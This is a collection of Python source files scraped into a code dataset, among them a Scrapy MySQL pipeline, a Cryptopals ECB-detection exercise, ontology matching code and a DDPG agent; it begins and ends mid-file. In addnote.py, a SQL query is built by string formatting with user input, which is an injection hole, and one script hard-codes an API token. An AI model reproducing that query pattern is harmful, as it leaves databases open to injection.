charset='utf8',\n cursorclass=pymysql.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"pymysql\", **dbparms)\n insert_sql = settings['insert_sql'] # no trailing comma: it would turn insert_sql into a 1-tuple and break cursor.execute()\n return cls(dbpool,insert_sql)\n\n def process_item(self, item, spider):\n # Use twisted to run the MySQL insert asynchronously\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider) # handle exceptions\n return item # pipelines must return the item so later stages receive it\n\n def handle_error(self, failure, item, spider):\n # Handle exceptions raised by the asynchronous insert\n print(failure)\n\n def do_insert(self, cursor, item):\n # Perform the actual insert\n # Build the SQL statement for each item type and insert it into MySQL\n # insert_sql, params = item.get_insert_sql()\n # print(insert_sql, params)\n # insert_sql = 
\"\"\"INSERT into code(code_num,code_name) VALUES(%s, %s) \"\"\"\n\n cursor.execute(self.insert_sql, (item['code_num'],item['code_name']))","sub_path":"dongcai/dongcai/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513914639","text":"#!/bin/python3\n\nimport requests\nimport json\n\n# Program to retrieve a JSON with a string and array of strings and return\n# from the answer to Code2040's API\n# Author: Elias G\n# Version: 1.11.16 (still a lil spooky bc it's early)\n\n# Summary: Sends a post HTTP request to get a JSON containing a string,\n# \"needle\", and an array, \"Haystack\", that contains the needle. It then finds\n# the index of the needle and returns the answer to the API in a JSON POST.\n\npost = {'token': '226490285c84885034cc6ff003f6d57a'}\nurlGetString = \"http://challenge.code2040.org/api/haystack\"\nurlGetValidation = \"http://challenge.code2040.org/api/haystack/validate\"\n\napiResponse = requests.post(urlGetString, post)\n\napiResponse = apiResponse.json()\nneedle = apiResponse[\"needle\"]\nhayStack = apiResponse[\"haystack\"]\n\n# testing outputs before moving on\n# print(type(needle))\n# print(needle)\n# print(hayStack)\n# index = hayStack.index(needle)\n\npost[\"needle\"] = hayStack.index(needle)\napiResponse = requests.post(urlGetValidation, post)\n","sub_path":"needleInAHaystackAPI.py","file_name":"needleInAHaystackAPI.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569080932","text":"\"\"\"\npicture.py\nAuthor: Claire Adner\nCredit: none\nAssignment:\nUse the ggame library to \"paint\" a graphical picture of something (e.g. a house, a face or landscape).\nUse at least:\n1. Three different Color objects.\n2. Ten different Sprite objects.\n3. One (or more) RectangleAsset objects.\n4. One (or more) CircleAsset objects.\n5. One (or more) EllipseAsset objects.\n6. 
One (or more) PolygonAsset objects.\nSee:\nhttps://github.com/HHS-IntroProgramming/Standards-and-Syllabus/wiki/Displaying-Graphics\nfor general information on how to use ggame.\nSee:\nhttp://brythonserver.github.io/ggame/\nfor detailed information on ggame.\n\"\"\"\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, CircleAsset, EllipseAsset, PolygonAsset\n\n# add your code here \\/ \\/ \\/\n\n# colors\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, .50)\nblack = Color(0x000000, 1.0)\nwhite = Color(0xffffff, 1.0)\nlight_blue = Color(0x0000ff, .05)\norange = Color(0xffa500, 1.0)\n\n# thin black line\nthinline = LineStyle(1, black)\n\n# background\nground_snow = RectangleAsset(1500, 275, thinline, blue)\n\n#the snowman body \nbase = CircleAsset (80, thinline, light_blue)\nmiddle = CircleAsset (50, thinline, light_blue)\nhead = CircleAsset (40, thinline, light_blue)\nnose = PolygonAsset([(0,0), (0,15), (30,12)], thinline, orange)\neyes = CircleAsset (5, thinline, black)\narm_left = PolygonAsset([(0,0), (15,5), (100,90), (100,100)], thinline, black)\narm_right = PolygonAsset([(210,0), (195,5), (100,90), (100,100)], thinline, black)\n\n#accessories \nhat_base = RectangleAsset(80, 20, thinline, black)\nhat_top = EllipseAsset(25, 28, thinline, black)\nbuttons = CircleAsset(5, thinline, black)\n\n# display\nSprite (ground_snow, (0,400))\nSprite (base, (350, 240))\nSprite (middle, (380, 140))\nSprite (head, (390, 60))\nSprite (nose, (430,100))\nSprite (eyes, (410, 80))\nSprite (eyes, (440, 80))\nSprite (arm_left, (280,100))\nSprite (arm_right, (480,100))\nSprite (hat_base, (390,40))\nSprite (hat_top, (405,4))\nSprite (buttons, (425,200))\nSprite (buttons, (425,180))\nSprite (buttons, (425,160))\n\n\n# add your code here /\\ /\\ /\\\n\n\nmyapp = App()\nmyapp.run()","sub_path":"picture.py","file_name":"picture.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483129571","text":"#!/usr/bin/python3\n\nfrom pymysqlhelper import PyMysqlHelper as mysqlhlper\n\ndef add_note(note_type, note_name, note_url, note_comment):\n\n db = mysqlhlper()\n sql_select_note_id = \"SELECT id FROM notetype WHERE type_name = '%s' limit 1\" % (note_type)\n results = db.select(sql_select_note_id)\n note_type_id = -1\n for row in results:\n note_type_id = row[0]\n sql_insert_one_note = \"INSERT INTO notes(note_type_id, note_name, note_url, note_comment) VALUES (%s, %s, %s, %s)\"\n params = (note_type_id, note_name, note_url, note_comment)\n db.update_by_param(sql_insert_one_note, params)\n\n db.close()\n","sub_path":"py/addnote.py","file_name":"addnote.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43476582","text":"# Copyright (c) Alibaba, Inc. and its affiliates.\n\nimport argparse\n\nimport json\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Unsupported value encountered.')\n\n\nclass HParams(dict):\n \"\"\" Hyper-parameters class\n\n Store hyper-parameters in training / infer / ... 
scripts.\n \"\"\"\n\n def __getattr__(self, name):\n if name in self.keys():\n return self[name]\n for v in self.values():\n if isinstance(v, HParams):\n if name in v:\n return v[name]\n raise AttributeError(f\"'HParams' object has no attribute '{name}'\")\n\n def __setattr__(self, name, value):\n self[name] = value\n\n def save(self, filename):\n with open(filename, 'w', encoding='utf-8') as fp:\n json.dump(self, fp, ensure_ascii=False, indent=4, sort_keys=False)\n\n def load(self, filename):\n with open(filename, 'r', encoding='utf-8') as fp:\n params_dict = json.load(fp)\n for k, v in params_dict.items():\n if isinstance(v, dict):\n self[k].update(HParams(v))\n else:\n self[k] = v\n\n\ndef parse_args(parser):\n \"\"\" Parse hyper-parameters from cmdline. \"\"\"\n parsed = parser.parse_args()\n args = HParams()\n optional_args = parser._action_groups[1]\n for action in optional_args._group_actions[1:]:\n arg_name = action.dest\n args[arg_name] = getattr(parsed, arg_name)\n for group in parser._action_groups[2:]:\n group_args = HParams()\n for action in group._group_actions:\n arg_name = action.dest\n group_args[arg_name] = getattr(parsed, arg_name)\n if len(group_args) > 0:\n args[group.title] = group_args\n return args\n","sub_path":"ai/modelscope/modelscope/utils/nlp/space/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357833773","text":"def num_repeated_blocks(ciphertext,size):\r\n total_length = len(ciphertext)\r\n array = []\r\n if total_length % size == 0:\r\n num_of_blocks = total_length // size\r\n for i in range(num_of_blocks):\r\n array.append(ciphertext[i*size:(i+1)*size])\r\n return num_of_blocks - len(set(array))\r\n else:\r\n return -1\r\n\r\n\r\ndef main():\r\n f = open('8.txt')\r\n lines = f.readlines()\r\n f.close()\r\n ciphertexts = []\r\n for i in range(len(lines)):\r\n ciphertexts.append(bytes.fromhex(lines[i]))\r\n max_score = 0\r\n possible = ''\r\n for ciphertext in ciphertexts:\r\n score = num_repeated_blocks(ciphertext,16)\r\n if score > max_score:\r\n max_score = score\r\n possible = ciphertext\r\n print(possible)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"set1challenge8.py","file_name":"set1challenge8.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14278741","text":"import numpy as np\nimport pandas as pd\nfrom typing import Dict, List, Tuple, Union\n\nfrom sfaira.versions.metadata import OntologyCl, OntologyUberon\nfrom sfaira.versions.metadata.extensions import ONTOLOGIY_EXTENSION\n\nTARGET_UNIVERSE_KEY_NAME = \"name\"\nTARGET_UNIVERSE_KEY_ID = \"id\"\n\n\nclass CelltypeUniverse:\n \"\"\"\n Cell type universe (list) and ontology (hierarchy) container class.\n\n\n Basic checks on the organ specific instance are performed in the constructor.\n \"\"\"\n onto_cl: OntologyCl\n onto_uberon: OntologyUberon\n _target_universe: Union[List[str], None]\n\n def __init__(self, cl: OntologyCl, uberon: OntologyUberon, **kwargs):\n self.onto_cl = cl\n self.onto_uberon = uberon\n self._target_universe = None\n self._set_extension()\n\n def _set_extension(self):\n self.onto_cl.add_extension(ONTOLOGIY_EXTENSION)\n\n def __validate_target_universe_table(self, tab: pd.DataFrame):\n assert len(tab.columns) == 2\n assert tab.columns[0] == \"name\" and tab.columns[1] == \"id\"\n\n def load_target_universe(self, fn):\n \"\"\"\n\n :param fn: 
.csv file containing target universe.\n :return:\n \"\"\"\n tab = pd.read_csv(fn, sep=\"\\t\", index_col=None)\n self.__validate_target_universe_table(tab=tab)\n self.onto_cl.leaves = tab[\"name\"].values\n\n def write_target_universe(\n self,\n fn,\n x: List[str],\n ):\n \"\"\"\n\n :param fn: .csv file containing target universe.\n :param x: Nodes that make up target universe.\n :return:\n \"\"\"\n tab = pd.DataFrame({\n TARGET_UNIVERSE_KEY_NAME: self.onto_cl.convert_to_name(x),\n TARGET_UNIVERSE_KEY_ID: self.onto_cl.convert_to_id(x),\n })\n self.__validate_target_universe_table(tab=tab)\n tab.to_csv(path_or_buf=fn, sep=\"\\t\", index=False)\n\n def prepare_celltype_map_fuzzy(\n self,\n source,\n match_only: bool = False,\n include_synonyms: bool = True,\n anatomical_constraint: Union[str, None] = None,\n choices_for_perfect_match: bool = True,\n omit_list: list = [],\n omit_target_list: list = [\"cell\"],\n n_suggest: int = 4,\n threshold_for_partial_matching: float = 90.,\n ) -> Tuple[\n List[Dict[str, Union[List[str], str]]],\n List[bool]\n ]:\n \"\"\"\n Map free text node names to ontology node names via fuzzy string matching and return as list\n\n If this function does not yield good matches, consider querying this web interface:\n https://www.ebi.ac.uk/ols/index\n\n Search strategies:\n\n - exact_match: Only exact string matches to name or synonym in ontology. This is the only strategy that is\n enabled if match_only is True.\n - lenient_match: Fuzzy string matches to name or synonym in ontology based on ratio of match errors\n ((fuzz.ratio).\n - very_lenient_match: Fuzzy string matches to name or synonym in ontology based on ratio of matches\n characters from query (fuzz.partial_ratio)\n\n Search strategies with anatomical constraints:\n An anatomic constraint is a name of an anatomical structure that can be mapped to UBERON.\n\n - anatomic_onotolgy_match:\n We select cell types expected in this UBERON clade based on the link between CL and UBERON.\n - anatomic_string_match:\n We perform an additional fuzzy string matching with the anatomical structure added to the proposed\n label. This is often beneficial because analysts do not always prefix such extension (e.g. pancreatic)\n to the free text cell type labels if the entire sample consists only of cells from this anatomical\n structure. Note that if the maps from 1) were perfect, this would not be necessary. In practice, we\n find this to still recover some hits that are otherwise missed.\n\n Note that matches are shadowed in lower priorty strategies, ie a perfect match will not show up in the list\n of hits of any other strategy.\n\n :param source: Free text node labels which are to be matched to ontology nodes.\n :param match_only: Whether to include strict matches only in output.\n :param include_synonyms: Whether to include synonyms of nodes in string search.\n :param anatomical_constraint: Whether to require suggestions to be within a target anatomy defined\n within UBERON.\n :param choices_for_perfect_match: Whether to give additional matches if a perfect match was found and an\n anatomical_constraint is not not defined. 
This is overridden by match_only.\n :param omit_list: Free text node labels to omit in map.\n :param omit_target_list: Ontology nodes to not match to.\n :param n_suggest: Number of cell types to suggest per search strategy.\n :param threshold_for_partial_matching: Maximum fuzzy match score below which lenient matching (ratio) is\n extended through partial_ratio.\n :return: Tuple\n\n - List with matches for each source, each entry is a dictionary,\n of lists of search strategies named by strategy name. If a search strategy yields perfect matches, it\n does not return a list of strings but just a single string.\n - List with boolean indicator whether or not this output should be reported.\n \"\"\"\n from fuzzywuzzy import fuzz\n matches = []\n nodes = self.onto_cl.nodes\n nodes = [x for x in nodes if x[1][\"name\"] not in omit_target_list]\n include_terms = []\n if isinstance(source, pd.DataFrame):\n source = list(zip(source.iloc[:, 0].values, source.iloc[:, 1].values))\n for x in source:\n if not isinstance(x, list) and not isinstance(x, tuple):\n x = [x, \"nan\"]\n term = x[0].lower().strip(\"'\").strip(\"\\\"\").strip(\"'\").strip(\"\\\"\").strip(\"]\").strip(\"[\")\n # Test for perfect string matching:\n scores_strict = np.array([\n np.max(\n [\n 100 if term == y[1][\"name\"].lower() else 0\n ] + [\n 100 if term == yy.lower() else 0\n for yy in y[1][\"synonym\"]\n ]\n ) if \"synonym\" in y[1].keys() and include_synonyms else 100 if term == y[1][\"name\"].lower() else 0\n for y in nodes\n ])\n # Test for partial string matching:\n # fuzz ratio and partial_ratio capture different types of matches well, we use both here and decide below\n # which scores are used in which scenario defined through the user input.\n # Formatting of synonyms: These are richly annotated, we strip references following after either:\n # BROAD, EXACT\n # in the synonym string and characters: \"'\n\n def synonym_string_processing(y):\n return y.lower().split(\"broad\")[0].split(\"exact\")[0].lower().strip(\"'\").strip(\"\\\"\").split(\"\\\" \")[0]\n\n scores_lenient = np.array([\n np.max([fuzz.ratio(term, y[1][\"name\"].lower())] + [\n fuzz.ratio(term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.ratio(term, y[1][\"name\"].lower())\n for y in nodes\n ])\n scores_very_lenient = np.array([\n np.max([fuzz.partial_ratio(term, y[1][\"name\"].lower())] + [\n fuzz.partial_ratio(term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.partial_ratio(term, y[1][\"name\"].lower())\n for y in nodes\n ])\n include_terms.append(term not in omit_list)\n if match_only and not anatomical_constraint:\n # Explicitly trying to report perfect matches (match_only is True).\n matches.append({\"perfect_match\": [nodes[i][1][\"name\"] for i in np.where(scores_strict == 100)[0]][0]})\n else:\n matches_i = {}\n if np.any(scores_strict == 100) and not anatomical_constraint:\n # Perfect match and not additional information through anatomical_constraint, ie no reason to assume\n # that the user is not looking for this hit.\n matches_i.update({\n \"perfect_match\": [nodes[i][1][\"name\"] for i in np.where(scores_strict == 100)[0]][0]\n })\n if choices_for_perfect_match:\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n if 
np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n else:\n if anatomical_constraint is not None:\n # Use anatomical constraints two fold:\n # 1. Select cell types that are in the correct ontology.\n # 2. Run a second string matching with the anatomical word included.\n\n # 1. Select cell types that are in the correct ontology.\n # Check that anatomical constraint is a term in UBERON and get UBERON ID:\n anatomical_constraint_id = self.onto_uberon.convert_to_id(anatomical_constraint)\n # Select up to 5 nodes which match the anatomical constraint:\n # The entries look as follows:\n # node.value['relationship'] = ['part_of UBERON:0001885']\n # Find nodes that can be matched to UBERON:\n anatomical_subselection = [\n \"relationship\" in y[1].keys() and\n np.any([\"part_of UBERON\" in yy for yy in y[1][\"relationship\"]]) and\n np.any([\n yy.split(\"part_of \")[-1] in self.onto_uberon.node_ids\n for yy in y[1][\"relationship\"]\n ])\n for y in nodes\n ]\n uberon_ids = [\n y[1][\"relationship\"][\n np.where([\"part_of UBERON\" in yy for yy in y[1][\"relationship\"]])[0][0]\n ].split(\"part_of \")[1]\n if z else None\n for y, z in zip(nodes, anatomical_subselection)\n ]\n # Check relationship in UBERON. Select for:\n # a) parent -> a more general setting across anatomies from which one was sampled\n # b) child -> a sub anatomy of the sampled tissue.\n # Check this by checking if one is an ancestor of the other:\n anatomical_subselection = [\n z and (\n anatomical_constraint_id in self.onto_uberon.get_ancestors(node=y) or\n y in self.onto_uberon.get_ancestors(node=anatomical_constraint_id)\n )\n for y, z in zip(uberon_ids, anatomical_subselection)\n ]\n # Iterate over nodes sorted by string match score and masked by constraint:\n matches_i.update({\n \"anatomic_onotolgy_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_lenient)\n if anatomical_subselection[i] and not\n np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][-n_suggest:][::-1]\n })\n\n # 2. Run a second string matching with the anatomical word included.\n modified_term = anatomical_constraint + \" \" + x[0].lower().strip(\"'\").strip(\"\\\"\").strip(\"]\"). 
\\\n strip(\"[\")\n scores_anatomy = np.array([\n np.max([\n fuzz.partial_ratio(modified_term, y[1][\"name\"].lower())\n ] + [\n fuzz.partial_ratio(modified_term, synonym_string_processing(yy))\n for yy in y[1][\"synonym\"]\n ]) if \"synonym\" in y[1].keys() and include_synonyms else\n fuzz.partial_ratio(modified_term, y[1][\"name\"].lower())\n for y in nodes\n ])\n matches_i.update({\n \"anatomic_string_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_anatomy)\n if nodes[i][1][\"name\"] and not\n np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][-n_suggest:][::-1]\n })\n\n # Select best overall matches based on lenient and strict matching:\n matches_i.update({\n \"perfect_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_strict)[::-1]\n ][:n_suggest]\n })\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n if np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n else:\n # Suggest top hits by string match:\n matches_i.update({\n \"lenient_match\": [\n nodes[i][1][\"name\"] for i in np.argsort(scores_lenient)[::-1]\n ][:n_suggest]\n })\n if np.max(scores_lenient) < threshold_for_partial_matching:\n matches_i.update({\n \"very_lenient_match\": [\n nodes[i][1][\"name\"]\n for i in np.argsort(scores_very_lenient)[::-1]\n if not np.any([nodes[i][1][\"name\"] in v for v in matches_i.values()])\n ][:n_suggest]\n })\n matches.append(matches_i)\n return matches, include_terms\n\n def prepare_celltype_map_tab(\n self,\n source,\n match_only: bool = False,\n include_synonyms: bool = True,\n anatomical_constraint: Union[str, None] = None,\n omit_list: list = [],\n n_suggest: int = 10,\n separator_suggestions: str = \":\",\n separator_groups: str = \":|||:\",\n ) -> pd.DataFrame:\n \"\"\"\n Map free text node names to ontology node names via fuzzy string matching and return as matching table.\n\n :param source: Free text node labels which are to be matched to ontology nodes.\n :param match_only: Whether to include strict matches only in output.\n :param include_synonyms: Whether to include synonyms of nodes in string search.\n :param anatomical_constraint: Whether to require suggestions to be within a target anatomy defined within\n UBERON.\n :param omit_list: Free text node labels to omit in map.\n :param n_suggest: Number of cell types to suggest per search strategy.\n :param separator_suggestions: String separator for matches of a single strategy in output target column.\n :param separator_groups: String separator for search strategy grouped matches in output target column.\n :return: Table with source and target node names. 
Columns: \"source\", \"target\"\n \"\"\"\n matches, include_terms = self.prepare_celltype_map_fuzzy(\n source=source,\n match_only=match_only,\n include_synonyms=include_synonyms,\n anatomical_constraint=anatomical_constraint,\n choices_for_perfect_match=False,\n omit_list=omit_list,\n n_suggest=n_suggest,\n )\n tab = pd.DataFrame({\n \"source\": source,\n \"target\": [\n separator_groups.join([\n separator_suggestions.join(v)\n if isinstance(v, list) else v\n for v in x.values()\n ])\n for x in matches\n ]\n })\n return tab.loc[include_terms]\n","sub_path":"sfaira/versions/metadata/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":18445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534135161","text":"# %%\n# 数据准备\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.tree import DecisionTreeRegressor\nimport pandas as pd\nimport os\n\nmelbourne_file_path = os.path.dirname(__file__) + '/melb_data.csv'\n\nmelbourne_data = pd.read_csv(melbourne_file_path)\n\n# dropna drops missing values (think of na as \"not available\")\nmelbourne_data = melbourne_data.dropna(axis=0)\ny = melbourne_data.Price\n\nmelbourne_features = ['Rooms', 'Bathroom',\n 'Landsize', 'Lattitude', 'Longtitude']\nX = melbourne_data[melbourne_features]\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\n\nprint(\"Set up Done!\")\n\n# %%\n# 模型1,决策树\n\n\ndef get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):\n model = DecisionTreeRegressor(\n max_leaf_nodes=max_leaf_nodes, random_state=0)\n model.fit(train_X, train_y)\n preds_val = model.predict(val_X)\n mae = mean_absolute_error(val_y, preds_val)\n return(mae)\n\n\n# for max_leaf_nodes in [5, 50, 500, 5000]:\n# my_mae = get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y)\n# print(\"Max leaf nodes: %d \\t\\t Mean Absolute Error: %d\" %\n# (max_leaf_nodes, my_mae))\n\n[(x, get_mae(x, train_X, val_X, train_y, val_y)) for x in [5, 50, 500, 5000]]\n\n# %%\n","sub_path":"DataScience/Kaggle/HoursePrice/kaggle-tree.py","file_name":"kaggle-tree.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393641028","text":"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\n\nfrom model import (SubActionActor, SubActionActorParallel, SubActionCritic, SubActionCriticParallel)\nfrom memory import SequentialMemory,BeamSpaceSubActionSequentialMemory\nfrom random_process import OrnsteinUhlenbeckProcess\nfrom util import *\n\n\n# device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# from ipdb import set_trace as debug\n\ncriterion = nn.MSELoss()\n\n\nclass SubAction_DDPG(object):\n def __init__(self, nb_states, nb_actions, args):\n self.seed = args.seed\n if self.seed > 0:\n self.seed(self.seed)\n\n self.nb_states = nb_states\n self.nb_actions= nb_actions\n self.num_beams_per_UE = args.num_beams_per_UE\n self.num_measurements = args.num_measurements\n self.window_length = args.window_length\n# self.combine_state = args.combine_state \n # Create Actor and Critic Network\n # self.actor = Actor(self.nb_states, self.nb_actions, **net_cfg)\n # self.actor_target = Actor(self.nb_states, self.nb_actions, **net_cfg)\n # self.actor_optim = Adam(self.actor.parameters(), lr=args.prate)\n\n # self.critic = Critic(self.nb_states, self.nb_actions, **net_cfg)\n # self.critic_target = 
Critic(self.nb_states, self.nb_actions, **net_cfg)\n # self.critic_optim = Adam(self.critic.parameters(), lr=args.rate)\n \n self.actor = SubActionActorParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.actor_target = SubActionActorParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.actor_optim = Adam(self.actor.parameters(), lr=args.prate)\n \n self.critic = SubActionCriticParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.critic_target = SubActionCriticParallel(self.nb_states, self.nb_actions, self.window_length, self.num_measurements).to(device)\n self.critic_optim = Adam(self.critic.parameters(), lr=args.rate)\n\n hard_update(self.actor_target, self.actor) # Make sure target is with the same weight\n hard_update(self.critic_target, self.critic)\n \n #Create replay buffer\n # self.memory = SequentialMemory(limit=args.rmsize, window_length=args.window_length)\n self.memory = BeamSpaceSubActionSequentialMemory(limit=args.rmsize, window_length=self.window_length, num_measurements=self.num_measurements)\n self.random_process = OrnsteinUhlenbeckProcess(size=self.actor.outshape, theta=args.ou_theta, mu=args.ou_mu, sigma=args.ou_sigma)\n\n # Hyper-parameters\n self.batch_size = args.bsize\n self.tau = args.tau\n self.discount = args.discount\n self.depsilon = 1.0 / args.epsilon\n\n # \n self.epsilon = 1.0\n self.ob_t = None # Most recent observation\n self.a_t = None # Most recent action\n self.is_training = True\n self.debug = args.debug\n self.actor_lambda = args.actor_lambda\n self.policy_update_counter = 0\n self.training_log = {'critic_mse':[],'actor_mse':[],'actor_value':[],'actor_total':[]}\n\n # \n # if USE_CUDA: self.cuda()\n\n def update_policy(self):\n # Sample batch\n state_batch, action_batch, subaction_rewards_batch, reward_batch, \\\n next_state_batch, terminal_batch = self.memory.sample_and_split(self.batch_size)\n\n # Prepare for the target q batch\n with torch.no_grad():\n next_states = torch.from_numpy(next_state_batch).type(torch.FloatTensor).to(device)\n target_actor_output = self.actor_target(next_states) \n # next_actions = torch.from_numpy(self.pick_beams_batch(to_numpy(predicted_beam_qual_target)))\n next_actions = self.actor_target.select_beams(to_numpy(target_actor_output), self.num_beams_per_UE)\n next_subq_values, next_q_values = self.critic_target([next_states,next_actions])\n # next_q_values.volatile=False\n next_subq_values.requires_grad = True\n next_q_values.requires_grad = True\n \n target_subq_batch = torch.from_numpy(subaction_rewards_batch).to(device) + \\\n self.discount*torch.from_numpy(terminal_batch.astype(np.float)).to(device)*next_q_values.expand(-1, self.nb_actions)/self.num_beams_per_UE\n \n target_q_batch = torch.from_numpy(reward_batch).to(device) + \\\n self.discount*torch.from_numpy(terminal_batch.astype(np.float)).to(device)*next_q_values\n\n # Critic update\n self.critic.zero_grad()\n subq_batch, q_batch = self.critic([torch.from_numpy(state_batch).type(torch.FloatTensor).to(device), action_batch])\n subvalue_loss = criterion(subq_batch, target_subq_batch)\n # subvalue_loss = torch.tensor(0)\n value_loss = criterion(q_batch, target_q_batch)\n # total_loss = 0.5*subvalue_loss + 0.5*value_loss\n total_loss = subvalue_loss\n # print(value_loss.item())\n total_loss.backward()\n self.training_log['critic_mse'].append([value_loss.item(),subvalue_loss.item()])\n self.critic_optim.step()\n\n # 
Actor update\n self.actor.zero_grad()\n \n # Beam qual prediction loss, only if using MSE of actor output\n states = torch.from_numpy(state_batch).type(torch.FloatTensor).to(device)\n actor_output = self.actor(states)\n # predicted_beam_qual = self.actor(states)\n # broadcasted_action_batch = np.expand_dims(action_batch, axis=1)\n # broadcasted_action_batch = np.repeat(broadcasted_action_batch, self.num_measurements, axis=1)\n # actor_output_masked = torch.mul(actor_output, to_tensor(broadcasted_action_batch))\n # true_beam_qual = to_tensor(next_state_batch[:,-self.num_measurements:,:])\n # actor_output_loss = criterion(actor_output_masked,true_beam_qual) \n # self.training_log['actor_mse'].append(actor_output_loss.item())\n \n # Value loss\n # actions = torch.from_numpy(self.pick_beams_batch(to_numpy(predicted_beam_qual)))\n actions = self.actor.select_beams(to_numpy(actor_output),self.num_beams_per_UE)\n subaction_policy_loss, policy_loss = self.critic([states,actions])\n policy_loss = -policy_loss.mean()\n self.training_log['actor_value'].append(policy_loss.item())\n policy_loss.backward()\n \n \n # # Combine actor output MSE and -value from critic\n # total_loss = (1-self.actor_lambda)*policy_loss + self.actor_lambda * actor_output_loss\n # self.training_log['actor_total'].append(total_loss.item())\n # total_loss.backward()\n \n #take a gradient step\n self.actor_optim.step()\n # if self.debug and self.policy_update_counter % 20 == 0:\n # print('Critic Loss: {}. Actor Prediction Loss: {}. Actor Policy Loss: {}'.format(value_loss.item(), beam_qual_prediction_loss.item(),policy_loss.item()))\n # Target update\n soft_update(self.actor_target, self.actor, self.tau)\n soft_update(self.critic_target, self.critic, self.tau)\n self.policy_update_counter += 1\n\n def eval(self):\n self.actor.eval()\n self.actor_target.eval()\n self.critic.eval()\n self.critic_target.eval()\n\n def cuda(self):\n self.actor.cuda()\n self.actor_target.cuda()\n self.critic.cuda()\n self.critic_target.cuda()\n\n def observe(self, subaction_r_t, r_t, ob_t1, done):\n# if self.is_training:\n# if self.combine_state:\n# combined_s_t = np.concatenate((self.ob_t, self.a_t), axis=0)\n# print(self.a_t)\n# self.memory.append(combined_s_t, self.a_t, r_t, done)\n# else:\n# self.memory.append(self.ob_t, self.a_t, r_t, done)\n# self.ob_t = ob_t1\n if self.is_training:\n self.memory.append(self.ob_t, self.a_t, subaction_r_t, r_t, done)\n self.ob_t = ob_t1\n \n def random_action(self):\n action = np.random.uniform(-1.,1.,self.nb_actions)\n binary_action = np.zeros(self.nb_actions)\n binary_action[np.argsort(action)[-self.num_beams_per_UE:]]=1\n self.a_t = binary_action\n return binary_action\n\n # def select_action(self, s_t, decay_epsilon=True):\n # action = to_numpy(\n # self.actor(to_tensor(np.array([s_t])))\n # ).squeeze(0)\n # action += self.is_training*max(self.epsilon, 0)*self.random_process.sample()\n # action = np.clip(action, -1., 1.)\n\n # if decay_epsilon:\n # self.epsilon -= self.depsilon\n \n # self.a_t = action\n # return action\n \n # a modified implementation of selection_action that enables window_length > 1\n def select_action(self, observation, decay_epsilon=True):\n with torch.no_grad():\n # s_t = self.memory.get_recent_state(np.concatenate((observation, self.a_t),axis=0))\n s_t = self.memory.get_recent_state(observation)\n #remove existing empty dimension and add batch dimension \n s_t_array = np.array([np.squeeze(np.array(s_t))])\n s_t_array_tensor = 
